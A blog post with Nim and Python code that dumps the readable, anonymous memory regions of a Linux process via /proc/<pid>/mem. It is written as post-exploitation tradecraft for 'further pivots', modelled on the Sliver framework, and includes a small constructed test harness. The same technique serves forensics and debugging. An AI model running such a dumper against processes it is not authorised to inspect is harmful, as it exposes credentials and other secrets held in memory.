Capturing process memory from /proc/pid/mem
fx2301
Posted on December 9, 2022
Why?
You want to inspect process memory to enable further pivots within an environment.
When?
You have root (or at least CAP_SYS_PTRACE over the target) on a Linux host, and no Linux Security Module (e.g. Yama's kernel.yama.ptrace_scope, SELinux, AppArmor) blocks access to /proc/<pid>/mem, which is gated by the same ptrace access check as attaching a debugger.
How?
A statically linked binary is especially convenient here (it drops onto the target as a single file with no dependency on the host's libc), as is learning from how others have solved the problem (e.g. Sliver's Dump Process Memory command).
This Nim code reads the region metadata from /proc/pid/maps and dumps to stdout the ranges of /proc/pid/mem that are readable, non-executable and not file-backed (device 00:00 in the maps entry). The output is the raw bytes of the selected ranges concatenated, with nothing recording which address each came from, so keep a copy of /proc/pid/maps alongside the dump if you need to map a hit back to a location. My experience mirrored the Sliver developer's in that [vvar] and [vdso] errored out when attempting to read them, so both are skipped explicitly:
```nim
import std/os
import std/strutils
import std/strformat

if paramCount() != 1:
  echo &"Usage: {paramStr(0)} <pid>"
  quit(1)

# open /proc/<pid>/mem once; each selected range is seeked to and copied out
let f = open(&"/proc/{paramStr(1)}/mem")
for line in lines(&"/proc/{paramStr(1)}/maps"):
  # fields: address-range perms offset dev inode [pathname]
  let parts = line.split(" ")
  # readable memory but not executable code
  if parts[1][0] == 'r' and not parts[1].contains('x'):
    # skip files mapped into memory (device 00:00 means anonymous memory)
    if parts[3] == "00:00":
      # skip memory we will error out accessing
      if not(line.endsWith("[vvar]") or line.endsWith("[vdso]")):
        let addresses = parts[0].split("-")
        let offset_start = addresses[0].parseHexInt()
        let offset_end = addresses[1].parseHexInt()
        f.setFilePos(offset_start)
        var buffer: array[1024, int8]
        var remaining = offset_end - offset_start
        while remaining > 0:
          let n = f.readBytes(buffer, 0, min(remaining, 1024))
          if n == 0:
            break  # short read (mapping changed or the kernel refused): move on instead of spinning
          remaining -= n
          discard stdout.writeBytes(buffer, 0, n)
f.close()
```
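The same selection logic in Python, as an added example that is not the post's code nor Sliver's: the maps parsing is pulled into a testable function, the dumper records a failed region (the EIO the post reports for [vvar]) and carries on rather than aborting, and the per-region result list keeps the address of every range so the dump can be mapped back. SAMPLE_MAPS and FakeMem are constructed stand-ins for a real /proc tree; `main` needs the same root/LSM conditions as the Nim version.

```python
import errno
import io
import re
import sys
from collections import namedtuple

# One /proc/<pid>/maps line: "start-end perms offset dev inode [pathname]".
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"[0-9a-f]+\s+(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)\s*(?P<path>.*)$")
Region = namedtuple("Region", "start end perms dev inode path")
UNREADABLE = {"[vvar]", "[vdso]"}  # reading these via /proc/<pid>/mem fails, per the post


def parse_maps(text):
    """Parse the text of /proc/<pid>/maps into Region records (addresses as ints)."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised maps line: {line!r}")
        regions.append(Region(int(m["start"], 16), int(m["end"], 16), m["perms"],
                              m["dev"], int(m["inode"]), m["path"].strip()))
    return regions


def is_target(r):
    """Readable, not executable, anonymous (device 00:00 = no backing file), not skipped."""
    return (r.perms[0] == "r" and "x" not in r.perms
            and r.dev == "00:00" and r.path not in UNREADABLE)


def dump_regions(mem, regions, out, chunk=64 * 1024):
    """Copy each region from `mem` (seekable binary file, e.g. /proc/<pid>/mem opened with
    buffering=0) to `out`; return (region, bytes_copied, errno_or_None) for each one."""
    results = []
    for r in regions:
        copied, err = 0, None
        try:
            mem.seek(r.start)
            while copied < r.end - r.start:
                data = mem.read(min(chunk, r.end - r.start - copied))
                if not data:  # short read: the mapping changed under us
                    break
                out.write(data)
                copied += len(data)
        except OSError as e:  # e.g. EIO on [vvar]; record it and keep going
            err = e.errno
        results.append((r, copied, err))
    return results


def main(argv):
    if len(argv) != 3:
        print(f"Usage: {argv[0]} <pid> <outfile>", file=sys.stderr)
        return 2
    pid, outfile = argv[1], argv[2]
    with open(f"/proc/{pid}/maps") as f:
        regions = [r for r in parse_maps(f.read()) if is_target(r)]
    with open(f"/proc/{pid}/mem", "rb", buffering=0) as mem, open(outfile, "wb") as out:
        for r, n, err in dump_regions(mem, regions, out):
            status = f"errno {err}" if err else f"{n}/{r.end - r.start} bytes"
            print(f"{r.start:x}-{r.end:x} {r.path or '[anon]'}: {status}", file=sys.stderr)
    return 0


# Constructed sample maps text (not captured from a real host), one line per filter branch.
SAMPLE_MAPS = """\
55a0d0000000-55a0d0001000 r--p 00000000 08:01 1234   /usr/bin/demo
55a0d0001000-55a0d0002000 r-xp 00001000 08:01 1234   /usr/bin/demo
55a0d0400000-55a0d0421000 rw-p 00000000 00:00 0      [heap]
7f1c00000000-7f1c00002000 rw-p 00000000 00:00 0
7ffd7a000000-7ffd7a021000 rw-p 00000000 00:00 0      [stack]
7ffd7a1b0000-7ffd7a1b4000 r--p 00000000 00:00 0      [vvar]
7ffd7a1b4000-7ffd7a1b6000 r-xp 00000000 00:00 0      [vdso]
"""


class FakeMem:
    """Constructed stand-in for /proc/<pid>/mem: `pages` maps region start -> bytes,
    and a read at any address in `faults` raises EIO as the kernel does for [vvar]."""
    def __init__(self, pages, faults=()):
        self.pages, self.faults, self.pos = pages, set(faults), 0

    def seek(self, pos):
        self.pos = pos

    def read(self, n):
        if self.pos in self.faults:
            raise OSError(errno.EIO, "Input/output error")
        for start, content in self.pages.items():
            off = self.pos - start
            if 0 <= off < len(content):
                data = content[off:off + n]
                self.pos += len(data)
                return data
        return b""


def demo():
    """Dump every readable/non-exec/anonymous region of SAMPLE_MAPS, deliberately without
    the [vvar] skip, so both the EIO path and the short-read path are exercised."""
    regions = [r for r in parse_maps(SAMPLE_MAPS)
               if r.perms[0] == "r" and "x" not in r.perms and r.dev == "00:00"]
    mem = FakeMem({0x55a0d0400000: b"H" * 0x21000,
                   0x7f1c00000000: b"A" * 0x1000,  # only half of the 0x2000 mapping is backed
                   0x7ffd7a000000: b"S" * 0x21000},
                  faults={0x7ffd7a1b0000})
    out = io.BytesIO()
    return dump_regions(mem, regions, out), out.getvalue()


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run as `python3 dump.py <pid> out.bin` as root; the per-region summary on stderr is the index into out.bin. Opening /proc/<pid>/mem with `buffering=0` matters: a buffered reader may issue reads that straddle the end of a mapping and report an error for bytes the unbuffered loop would have copied.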